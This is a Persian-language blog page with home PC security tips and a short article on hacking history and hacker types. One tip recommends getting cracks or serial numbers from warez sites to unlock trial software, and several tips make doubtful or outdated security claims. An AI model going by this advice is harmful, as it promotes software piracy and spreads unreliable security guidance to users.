8.2: استفاده از برنامه های ضد پاپ آپ. خیلی از PopUp ها باعث قفل شدن و در نتیجه بسته شدن IE می شوند و حتی می توانند حاوی کدهای مخرب و ویروس نیز باشند. بهترین برنامه هایی که برای این کار وجود دارد Zero PopUp و AdWare 6.0 است، البته Adware بسیار بهتر عمل می کند و علاوه بر قابلیت ضد Pop up قابلیت Anti Spyware را نیز دارا می باشد.

8.3: پاک کردن و غیر فعال کردن ذخیره سازی پسورد توسط IE. با توجه به ذخیره شدن پسورد ایمیل ها و یا وبلاگ شخصی شما در IE، از این رو می تواند مورد سوء استفاده هکرها قرار گیرد. برای انجام این کار مراحل زیر را طی کنید:

Internet Explorer > Internet Option > {tab} Content > Auto Complete

و سپس دکمه Clear Password را می زنیم و بعد از آن تیک گزینه User Names & Passwords on Forms را بر می داریم.
صفحاتی که عکس یا عکسهای آنها نمایان نمی شود را Refresh نکنیم، چون این یکی از روشهای آلوده سازی کامپیوتر قربانی به ویروس یا تروجان است و برای دیدن عکس مذکور روی آن کلیک راست بزنید و سپس گزینه Show Picture را بزنید. ممکن است سایتی حتی قسمتهای دیگرش نیز به درستی باز نشده باشد در این صورت نیز Refresh نکنید و آدرس آن سایت را در یک صفحه جدید IE وارد کنید.

8.4: استفاده از برنامه های ضد برنامه های جاسوسی یا همان Anti Spyware و Anti AdWare که بهترین آنها Adware 6.0 و SpyHunter و SpySweeper می باشند.

نکته 1: برنامه AdWare تنها اشکالی که دارد این است که باید ابتدا یک فایل کوچک را دانلود کنید و بعد از اجرای آن به طور خودکار برنامه اصلی که حجم زیادتری دارد دانلود می شود و شما نمی توانید آن را با برنامه های افزایش دهنده سرعت دانلود کنید و همچنین برنامه اصلی را در اختیار نخواهید داشت تا بعد از تعویض ویندوز دوباره آن را نصب کنید و هر بار که ویندوز نصب می کنید باید آن را دوباره دانلود کنید.

نکته 2:
برنامه SpySweeper یک برنامه بسیار عالی است که دائما در حال بررسی کوکی ها و دیگر برنامه های مخرب احتمالی است و به طور خودکار کوکی های خطرناک را پاک می کند. این برنامه دارای یک سکنر Spyware هم هست و مثل ویروس کش ها می تواند درایوهای هارد را بررسی کند ولی با این تفاوت که این برنامه به جای ویروس، برنامه های جاسوسی را یافته و آنها را از بین می برد. تنها اشکال این برنامه آن است که برنامه Dap که برای دریافت تبلیغات و رجیستر شدن مرتبا به سایتش مراجعه و اطلاعات ارسال می کند را به عنوان برنامه جاسوسی می شناسد و آن را پاک می کند.

نکته 3:
برنامه SpyHunter بیشتر به درد کاربران حرفه ای تر می خورد و خود کاربر باید جلوی فایلهایی را که به اینترنت وصل می شوند را با شناخت کافی که دارد بگیرد. این برنامه خیلی کم حجم قابلیت کنترل Spyware ها و کد های مخربی که در خود سایت قرار دارند {به صورت فایل جداگانه {server} نیستند} و با آن Load می شوند را دارد و همه آنها را به طور خودکار Block می کند. همچنین با کمک این برنامه می توانید ارسال اطلاعات توسط هر تروجانی را متوقف کنید و حتی بهترین آنتی ویروس ها هم ممکن است که یک تروجان جدید را نشناسند و این برنامه از این نظر بهترین انتخاب است.
برای درک بهتر ادامه می دهم که این نرم افزار فایلهایی را که اطلاعات ارسال می کنند را monitor کرده و به طور پیش فرض در لیست سبز قرار می دهد و شما می توانید فایل مورد نظر را در لیست قرمز قرار دهید، بدین ترتیب فایل مذکور بلوکه می شود. نکته جالبی که در اینجا نهفته است این است که می توانید فایل هایی نظیر Ie.exe یا dap.exe را در لیست قرمز قرار دهید تا امکان کار کردن با آنها میسر نباشد، البته بهتر است این برنامه را همراه برنامه های فوق به کار گیرید.

 9: از چه سایتی برنامه Download می کنیم. ابتدا باید سایت مورد نظر را از آدرس فایلی که برای دانلود وجود دارد مورد بررسی قرار دهیم. هیچ وقت برنامه ها را از سایتهای ثالث نگیریم چون هیچ دلیل منطقی برای کار آنها وجود ندارد و بدون شک برنامه ای که ما از آنها می گیریم دارای ویروس یا تروجان است و این نکته باید بسیار مورد توجه شرکتهای رایت سی دی و سایتهایی باشد که برنامه برای دانلود معرفی می کنند. معمولا سایتهایی که برنامه های شرکتهای دیگر را برای دانلود می گذارند اسم های عجیب و غریب و طولانی دارند. یکی دیگر از مشخصه های سایتهایی که برنامه هایی که برای دانلود گذاشته اند متعلق به خودشان نیست آن است که آنها لیست های طویلی از برنامه های مختلف دارند که همگی آنها از همان {سایت} Domain و بدون توضیح، Preview و قسمت Help می باشند، باید بدانید سایتی که برنامه خودش را برای دانلود گذاشته اولا تعداد محدودی برنامه دارد، ثانیا برنامه را همراه Tutorial و Help و خیلی چیزهای دیگه معرفی می کند و آدرس مشخصی دارد، همچنین در سایت اصلی برنامه عکسها و Screen Shot هایی همراه با توضیحات اضافه از برنامه مورد نظر وجود دارد.
سایتهایی که آدرس آنها بصورت IP است بسیار خطرناکند و ممکن است Admin آن سایت با بدست آوردن IP شما که از طریق بازدید شما از آن سایت به دست او می رسد اقدام به هک کردن شما بکند یا همانطور که گفتم برنامه ای که در آن سایت برای دانلود قرار گرفته حاوی ویروس یا تروجان ... باشد! حال ممکن است این سوال پیش بیاید که فلان برنامه دارای محدودیت زمانی یا عملکرد است و اگر ما آن برنامه را از این سایت اصلی دانلود کنیم چگونه می توانیم محدودیت آن را از بین ببریم و در جواب سوال شما باید بگویم که ابتدا نسخه Trial یا Demo برنامه را از سایت اصلی بگیرید و بعد از آن کرک آن برنامه را که حجم خیلی کمی هم دارد را از سایتهایی که برای این منظور می باشند دریافت کنید، البته در موارد بسیار نادری اتفاق می افتد که کرک مربوطه حاوی ویروس است. ولی احتمال ویروسی شدن توسط آن خیلی کمتر از دریافت نسخه کامل کرک شده برنامه است و بهتر است از کرکهایی که شماره سریال در اختیار شما می گذارند استفاده کنید و کرکهایی که به جای فایل اصلی جایگزین می شوند خیلی مطمئن نیستند و حتی ممکن است از قابلیت برنامه بکاهند و برنامه آنطور که می بایست کار نکند. خاطر نشان می کنم دریافت سریال برنامه هیچ خطری ندارد و مطمئن ترین راه کرک کردن نرم افزار است.
به سایت هایی که برنامه ها را کرک می کنند و آنها را برای دانلود می گذارند سایتهای Warez یا غیر قانونی می گویند. برای پیدا کردن سایت اصلی برنامه باید در گوگل به این صورت جستجو کنید:

Official Site + Name of Program (در قسمت Name of Program باید نام برنامه مربوطه را بنویسید.)

 10: همیشه به آیکون و پسوند عکسهایی که از طریق چت می گیرید توجه کنید و از طرف مقابل بخواهید که عکسش را به ایمیلتان بفرستد چون خود یاهو دارای Norton Anti Virus می باشد و فایل قبل از دانلود شدن Scan می شود و فقط در مواردی نادر ممکن است Yahoo ویروسی که همراه عکس هست را نشناسد به همین خاطر عکس مربوطه را پس از Download با ویروس کش KasperSky یا NOD32 نیز Scan کنید.

 11: از کار انداختن System Restore. همانطور که می دانید فایلهایی که پسوند های سیستمی مثلdll ، exe و غیره داشته باشند، پس از پاک کردن یا اعمال تغییرات در System Restore ذخیره می شوند و این مسئله زمانی خطر ساز می شود که یک فایل ویروسی را به صورت دستی یا به کمک برنامه های ضد ویروس یا ضد Spyware پاک {Delete} یا تمیز{Clean} کرده اید، ولی غافل از اینکه ویندوز این فایلها را در جایی دیگر حفظ کرده است و همچنان ویروس به فعالیت خود ادامه می دهد. برای از کار انداختن System Restore مراحل زیر را دنبال کنید:

Control Panel > System > {tab} System Restore > Turn off System Restore on All Drive

 12: شاید زیاد اتفاق افتاده باشد که از طریق چت یا از یک سایت مشکوک عکس Download کرده باشید و نگرانید که این فایل حاوی تروجان یا ویروس مخصوص فایلهای JPG باشد و به همین خاطر عکس مربوطه را در کافی نت باز کنید و کلید F11 را بزنید و سپس کلید Print Screen را فشار دهید و بعد از آن برنامه Paint را باز کنید و Ctrl + V را بزنید و حالا می توانید عکس را با خیال راحت با هر پسوندی ذخیره کنید.
شاید بپرسید چرا برای این کار از برنامه های Picture Converter استفاده نکنیم و در جوابتان باید بگویم که ممکن است در فرایند تبدیل فایل ممکن است کدهای ویروس نیز ترجمه شده و همراه عکس Convert شده باقی بمانند ولی در روش فوق، فرایند تهیه عکس هیچ نیازی به عکس مشکوک به ویروس ندارد.

 13: هرگز اسم کامپیوتر {Computer Name} خود را واقعی ندهید. هکرها می توانند اسم کامپیوتر شما و در نتیجه اسم شما را بیابند و برای جلوگیری از این کار یک اسم مستعار برای خود انتخاب کنید. همچنین از وارد کردن اسم و مشخصات واقعی خود در برنامه هایی مثل Photoshop و غیره که در زمان نصب از شما اسم و مشخصات می خواهند نیز خودداری کنید.


 

 
______بابک بوتر______ بازدید : 131 شنبه 16 اردیبهشت 1391 نظرات (0)

 

 

نگاهی به حفظ امنیت سیستم و مقابله با هک در دنیای مجازی




امروزه در دنیایی زندگی می کنیم که اینترنت بخش مهمی از آن را تشکیل می دهد. بسیاری از خریدها آنلاین انجام می گیرد و سیستم های تجاری زیادی از این طریق به هم مرتبط هستند و ظهور کامپیوترهای رومیزی و افزایش آنها در خانه ها، کامپیوتر را در دسترس گروه های زیادی از مردم قرار داده است به همین علت این امر زمینه را برای فعالیت هکرها نیز گسترش داده است. شاید برای بسیاری هنوز این سوال مطرح باشد که هک چیست که در پاسخ باید گفت به هر نوع نفوذ که توسط هکر در یک سیستم امنیتی شبکه و کامپیوتری انجام گیرد به نوعی هک گفته می شود. واژه هک به معنی نفوذ به سیستم های کامپیوتری و دسترسی غیرمجاز به سیستم است و به شخصی که این کار را انجام می دهد هکر گفته می شود.

مفهوم هک همپای پیشرفت کامپیوتر همواره تغییر کرده است. در ابتدا مفهوم هک استفاده از ابزارهای الکترونیکی و ارتباطی نظیر تلفن جهت استفاده رایگان از آنها بود که بعدها توسط کارشناسان نرم افزاری جهت به دست آوردن کد و اطلاعات برنامه ها تغییر کرد و در حال حاضر هک به دستیابی غیرمجاز به اطلاعات یک کامپیوتر یا شبکه گفته می شود. در گذشته تصور عمومی بر آن بود که هکرها بی آنکه قابل ردیابی باشند اطلاعات را به سرقت می برند، این در حالی است که اگر از کارشناسان امنیت کامپیوتر در این موارد استفاده شود، می توانند نحوه هک شدن و نیز حتی فرد هکر را نیز شناسایی کنند.

هک می تواند جنبه شخصی یا حرفه یی داشته باشد، به عبارت دیگر هکرها می توانند کلمات عبور یا اطلاعات شخصی یا شرکتی را به سرقت ببرند یا در سطح بالاتری برای امنیت ملی خطراتی ایجاد کنند، مانند دخالت در امور ارتباطی، مالی و...

برخلاف تصوری که مردم از هکرها به عنوان افراد منزوی و ناراحت دارند، بسیاری از هکرها افرادی باهوش و خلاق هستند و صرفاً به دلیل ارضای حس کار گروهی یا احساس قدرت اقدام به این کار می کنند.

گفتنی است هکرها به چند دسته تقسیم می شوند اما شاید بد نباشد قبل از دسته بندی هکرها مروری بر تاریخچه هک و هکر داشته باشیم. هک احتمالاً عمری به اندازه عمر کامپیوتر دارد. روز اول کامپیوتری کار می کرد و روز دوم هک می شد. MIT اولین گروه از هکرهای کامپیوتری را معرفی کرد؛ گروهی جوان از تحصیلکردگان علوم کامپیوتر که روی ماشین کارت پانچ دل کار می کردند. به هرحال باید گفت هک هیچ مرز بین المللی نمی شناسد. هک در همه جا هست. با ظهور اینترنت مدرن، هک نیز رشد کرد.

هک بیشتر به عنوان یک هویت مستقل ظهور کرد. روترها به درستی تنظیم نمی شدند، همچنان که این مساله امروز نیز وجود دارد. معمولاً کاربران از ارتباطات خطوط تلفن برای دستیابی به شرکت های بزرگ دولتی و ارتشی استفاده می کردند و بقیه نیز پشت ترمینال هایی می نشستند که مستقیماً به سیستم هایی وصل بودند که آنها در حال هک کردن شان بودند. این سیستم ها از ماشین های مین فریم بزرگ و درایوهای نواری تشکیل می شدند. دسترسی به آنها عموماً با هک کردن کمترین میزان امنیت یعنی شناسه و رمز عبور به دست می آمد. البته منظور این نیست که هک در آن زمان آسان تر بود. میانگین سطح دانش هکرها نیز بالاتر رفته است. در ضمن امروزه نرم افزارهای آسیب رسان نیز به راحتی در دسترس افراد با دانش کم قرار دارد. هدف از بسیاری نفوذها دستیابی به سیستم هایی بود که به نظر غیرقابل دستیابی یا امن بودند. در حقیقت شکستن امنیت این سیستم ها یک چالش محسوب می شد. بعد از مروری کوتاه بر تاریخچه هک نگاهی به دسته بندی هکرها در دنیای مجازی داریم :

:: کلاه سفید یک هکر مهربان

هکرهای کلاه سفید که به آنها سامورایی یا هکرهای واقعی گفته می شود، هکرهایی هستند که هدف شان از نفوذ به سیستم ها نشان دادن ضعف سیستم های کامپیوتری است نه سوءاستفاده. هکرهای کلاه سفید متخصصان کامپیوتر و آشنا به فناوری اطلاعات هستند و هدف شان از نفوذ به سیستم های کامپیوتری کشف عیوب امنیتی در سیستم و برطرف کردن آنها است و قصد سوء استفاده ندارند.

:: کلاه سیاه یک هکر نامهربان


هکرهای کلاه سیاه که به آنها واکر هم گفته می شود از نظر کاری دقیقاً برعکس هکر کلاه سفید عمل می کنند به این صورت که باید گفت کسی که هدفش از نفوذ به سیستم ها، استفاده از اطلاعات آن سیستم هاست. این گروه از هکرها بیشترین صدمات را به سیستم های کامپیوتری وارد می کنند.

:: قفل بازکن هایی به نام کراکر


قفل شکن هدفش از نفوذ به سیستم ها، خرابکاری و ایجاد اختلال در سیستم های کامپیوتری است. از نظر ماهیت کار این گروه از هکرها جزء گروه هکرهای کلاه سیاه است. فعالیت این گروه از هکرها بیشتر در مورد نرم افزارها و سیستم های کامپیوتری است که دارای قفل بوده و به صورت مجانی یا اختصاصی مورد استفاده قرار می گیرد. فعالیت این گروه در حوزه نرم افزار بسیار فراگیر است. برخی از تولیدکنندگان نرم افزار بر این باورند که کراکرها سراغ محصولات آنها نمی روند. با وجودی که متخصصان امنیت کامپیوتر به روش های گوناگون در این مورد به تولیدکنندگان و کاربران این گونه محصولات هشدار می دهند ولی باز شاهد ضعف های این محصولات هستیم. این ضعف ها می تواند به صورت نقص در کد یا منطق برنامه یا حتی عدم سازگاری محصول نرم افزاری با سایر محصولات موجود روی سیستم بروز کند.

:: هکر اولیه به نام پراکر


از قدیمی ترین و در واقع هکرهای اولیه یی بودند که برای کارشناسان نیاز به کامپیوتر نداشتند و بیشتر کارشان نفوذ به خطوط تلفن برای تماس مجانی، استراق سمع و... بود.

:: هکرهای جوان


این گروه از هکرها با سایر گروه های هک تفاوت دارند. هکرهای جوان برخلاف سایر هکرها که ابزار و برنامه های مورد نیاز را خودشان می نویسند و برای هک از معلومات خود استفاده می کنند، با استفاده از برنامه های خدماتی ویژه هک که به وسیله دیگران نوشته شده است مانند Sub7 و به راحتی از طریق اینترنت یا فروشگاه ها قابل تهیه است، به سیستم های کامپیوتری خسارت وارد می کنند. این گروه از هکرها بیشتر با هدف سرگرمی یا نمایش دانش خود به دیگران اقدام به این کار می کنند ولی گاهی مشاهده شده است که از این کار برای اهداف دیگری بهره گرفته اند، به عنوان مثال می توان به هکی که توسط تعدادی دانش آموز در یکی از مدارس امریکا صورت گرفت، اشاره داشت که در آن دانش آموزان با نفوذ به شبکه مدرسه نمرات امتحانی خود را تغییر دادند.

 

تعداد صفحات : 3

درباره ما
سایتی دیگر از تیم بزرگ بکس 021 برای انتقال تجربیات ارزشمندشان دز زمینه های بالا بردن امنیت سیستم های یوزرهای بازدیدکننده عزیز
اطلاعات کاربری
  • فراموشی رمز عبور؟
  • آرشیو
    نظرسنجی
    نظرتان در مورد هک ایران چیست
    آمار سایت
  • کل مطالب : 65
  • کل نظرات : 10
  • افراد آنلاین : 1
  • تعداد اعضا : 52
  • آی پی امروز : 0
  • آی پی دیروز : 0
  • بازدید امروز : 2
  • باردید دیروز : 1
  • گوگل امروز : 0
  • گوگل دیروز : 0
  • بازدید هفته : 3
  • بازدید ماه : 83
  • بازدید سال : 701
  • بازدید کلی : 25,346